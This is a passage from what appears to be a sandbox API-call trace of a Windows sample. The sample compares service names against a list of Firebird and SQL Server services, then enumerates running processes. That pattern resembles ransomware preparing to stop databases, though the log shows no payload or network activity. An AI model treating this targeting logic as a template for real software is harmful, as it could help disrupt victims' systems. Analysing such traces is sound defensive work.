(lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0162.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0162.903] lstrlenW (lpString="lmhosts") returned 7 [0162.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0162.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0162.903] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0162.903] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0162.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0162.903] lstrlenW (lpString="LSM") returned 3 [0162.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0162.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0162.903] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0162.903] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0162.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0162.903] lstrlenW (lpString="MpsSvc") returned 6 [0162.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0162.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0162.904] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0162.904] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0162.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0162.904] lstrlenW (lpString="NcbService") returned 10 [0162.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0162.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0162.904] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0162.904] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0162.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0162.904] lstrlenW (lpString="netprofm") returned 8 [0162.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0162.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0162.904] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0162.904] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0162.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0162.904] lstrlenW (lpString="NgcSvc") returned 6 [0162.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0162.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0162.904] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0162.904] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0162.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0162.904] lstrlenW (lpString="NlaSvc") returned 6 [0162.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0162.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0162.904] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0162.904] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0162.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0162.905] lstrlenW (lpString="nsi") returned 3 [0162.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0162.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0162.905] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0162.905] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0162.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0162.905] lstrlenW (lpString="PcaSvc") returned 6 [0162.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0162.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0162.905] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0162.905] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0162.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0162.905] lstrlenW (lpString="PlugPlay") returned 8 [0162.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0162.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0162.905] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0162.905] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0162.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0162.905] lstrlenW (lpString="Power") returned 5 [0162.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0162.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0162.905] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0162.905] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0162.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0162.906] lstrlenW (lpString="ProfSvc") returned 7 [0162.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0162.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0162.906] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0162.906] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0162.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0162.906] lstrlenW (lpString="RpcEptMapper") returned 12 [0162.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0162.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0162.906] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0162.906] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0162.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0162.906] lstrlenW (lpString="RpcSs") returned 5 [0162.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0162.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0162.906] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0162.906] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0162.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0162.906] lstrlenW (lpString="SamSs") returned 5 [0162.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0162.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0162.906] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0162.906] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0162.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0162.906] lstrlenW (lpString="Schedule") returned 8 [0162.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0162.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0162.906] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0162.906] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0162.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0162.907] lstrlenW (lpString="SecurityHealthService") returned 21 [0162.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0162.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0162.907] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0162.907] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0162.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0162.907] lstrlenW (lpString="SENS") returned 4 [0162.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0162.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0162.907] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0162.907] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0162.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0162.907] lstrlenW (lpString="ShellHWDetection") returned 16 [0162.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0162.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0162.907] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0162.907] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0162.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0162.907] lstrlenW (lpString="Spooler") returned 7 [0162.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0162.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0162.907] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0162.907] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0162.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0162.907] lstrlenW (lpString="StateRepository") returned 15 [0162.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0162.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0162.907] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0162.907] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0162.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0162.908] lstrlenW (lpString="SysMain") returned 7 [0162.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0162.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0162.908] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0162.908] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0162.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0162.908] lstrlenW (lpString="SystemEventsBroker") returned 18 [0162.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0162.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0162.908] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0162.908] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0162.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0162.908] lstrlenW (lpString="Themes") returned 6 [0162.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0162.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0162.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0162.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0162.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0162.908] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0162.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0162.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0162.908] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0162.908] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0162.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4591fc0 | out: hHeap=0x6a0000) returned 1 [0162.908] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x50c [0162.912] Process32FirstW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.913] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0162.914] lstrlenW (lpString="System") returned 6 [0162.914] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0162.915] lstrlenW (lpString="smss.exe") returned 8 [0162.915] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.916] lstrlenW (lpString="csrss.exe") returned 9 [0162.916] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0162.917] lstrlenW (lpString="wininit.exe") returned 11 [0162.917] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.918] lstrlenW (lpString="csrss.exe") returned 9 [0162.918] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0162.919] lstrlenW (lpString="winlogon.exe") returned 12 [0162.919] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0162.920] lstrlenW (lpString="services.exe") returned 12 [0162.920] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0162.921] lstrlenW (lpString="lsass.exe") returned 9 [0162.921] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0162.922] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0162.922] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0162.923] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0162.923] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.924] lstrlenW (lpString="svchost.exe") returned 11 [0162.924] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.925] lstrlenW (lpString="svchost.exe") returned 11 [0162.925] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0162.926] lstrlenW (lpString="dwm.exe") returned 7 [0162.926] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.927] lstrlenW (lpString="svchost.exe") returned 11 [0162.927] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.928] lstrlenW (lpString="svchost.exe") returned 11 [0162.928] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.929] lstrlenW (lpString="svchost.exe") returned 11 [0162.929] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.930] lstrlenW (lpString="svchost.exe") returned 11 [0162.930] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.931] lstrlenW (lpString="svchost.exe") returned 11 [0162.931] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.932] lstrlenW (lpString="svchost.exe") returned 11 [0162.932] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.933] lstrlenW (lpString="svchost.exe") returned 11 [0162.933] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.934] lstrlenW (lpString="svchost.exe") returned 11 [0162.934] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.935] lstrlenW (lpString="svchost.exe") returned 11 [0162.935] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.936] lstrlenW (lpString="svchost.exe") returned 11 [0162.936] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0162.936] lstrlenW (lpString="spoolsv.exe") returned 11 [0162.937] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.937] lstrlenW (lpString="svchost.exe") returned 11 [0162.937] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0162.938] lstrlenW (lpString="audiodg.exe") returned 11 [0162.938] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0162.939] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0162.939] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0162.940] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0162.940] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0162.941] lstrlenW (lpString="Memory Compression") returned 18 [0162.941] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0162.942] lstrlenW (lpString="sihost.exe") returned 10 [0162.942] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.943] lstrlenW (lpString="svchost.exe") returned 11 [0162.943] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0162.944] lstrlenW (lpString="msoia.exe") returned 9 [0162.944] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0163.072] lstrlenW (lpString="taskhostw.exe") returned 13 [0163.072] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.087] lstrlenW (lpString="explorer.exe") returned 12 [0163.087] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0163.088] lstrlenW (lpString="SearchUI.exe") returned 12 [0163.088] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0163.089] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0163.089] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0163.090] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0163.090] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0163.091] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0163.091] Process32NextW (in: hSnapshot=0x50c, lppe=0x252fd2c | out: 